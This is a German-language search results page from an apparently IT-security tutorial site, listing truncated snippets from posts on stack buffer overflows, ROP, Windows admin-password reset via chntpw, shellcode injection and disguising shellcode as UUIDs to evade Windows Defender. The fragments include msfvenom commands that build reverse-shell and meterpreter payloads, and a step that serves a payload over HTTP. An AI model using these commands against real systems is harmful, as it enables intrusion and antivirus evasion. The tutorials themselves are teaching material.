Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Volltextergebnisse:
- Buffer Overflow im 64-Bit Stack - Teil 3
- docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python3 -m ... t es eine modifizierte Version auf Github. <code bash> /dir/to/socat TCP-LISTEN:2323,reuseaddr,fork EXE... Wir prüfen, wo der Pfad zur ''libc'' ist: <code bash> ldd bof-part3 linux-vdso.so.1 (0x00007ff... den wir das Offset für ''write()'' heraus: <code bash> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | gre
- Buffer Overflow im 64-Bit Stack - Teil 1
- ithub.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/p... peicherbereiche nicht randomisiert werden. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomize_va_... urn 0; } </code> \\ \\ === Kompilieren === <code bash> gcc -fno-stack-protector -z execstack bof.c -o b... enerieren einen 200 Zeichen langen String: <code bash> gdb -q vulnerable pattern_create 200 in.bin r <
- Buffer Overflow im 64-Bit Stack - Teil 2
- ompilierte Binary]] aus dem Blog debuggen. <code bash> br *vuln+73 # setze Breakpoint r < in.txt... w_x64|Teil 1]], benötigen wir noch ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== ASLR... as base address as in the examples above. <code bash> gcc -fno-stack-protector -no-pie bof-part2.c -o ... ropper und lassen uns die Gadgets anzeigen <code bash> ropper --file bof-part2 ... 0x000000000040116a:
- Privilegien-Eskalation: Windows-Admin dank Linux
- nnen wir ''chntpw'' installieren, mittels: <code bash> sudo apt install chntpw </code> \\ \\ ==== Windo... en ==== Wir suchen die Windows Partition. <code bash> sudo sfdisk -l </code> {{:it-security:blog:scre... ellen diesen in unserem $HOME-Verzeichnis. <code bash> mkdir ~/win </code> Anschließend mounten wir die Partition. <code bash> sudo mount /dev/sda3 ~/win </code> Nun navigier
- Shellcode Injection Teil 3
- usgeben. Dies machen wir mit ''%%nasm%%'': <code bash> nasm -f win32 download.asm -o shellcode.o </code... r uns nun ''%%C++%%'' freundlich anzeigen: <code bash> objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep ... sen erzeugen wir uns mit ''%%msfvenom%%''. <code bash> msfvenom -p python/meterpreter/reverse_tcp LHOST... . Also bereiten wir dies entsprechend vor: <code bash> cp payload.py nat.zip python -m http.server 80
- Shellcode Injection Teil 1
- shell.c | Speichere in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... erstellen wir den Shellcode im Raw Format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... weiterhin}}] \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Shellcode Injection Teil 2
- ter enkodieren. Die Ausgabe erfolgt binär: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=... ssanten Blog Beitrag]] näher erklärt wird: <code bash> python3 function_encoder.py --shellcode shell.ra... post-3.png|}} \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Obfuscation: Shellcode als UUIDs tarnen
- der Regel durch Windows Defender erkannt. <code bash> python shencode.py create -c="-p windows/x64/she... Payload encoden wir nun als UUID-Strings. <code bash> python shencode.py encode -f shell_rev.raw -u </
- Shellcode Injection Teil 4
- Code nun mit folgendem Befehl kompilieren: <code bash> nasm -f win64 calc-unsanitized.asm -o calc-unsan... ellcode4-01.png|}} ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel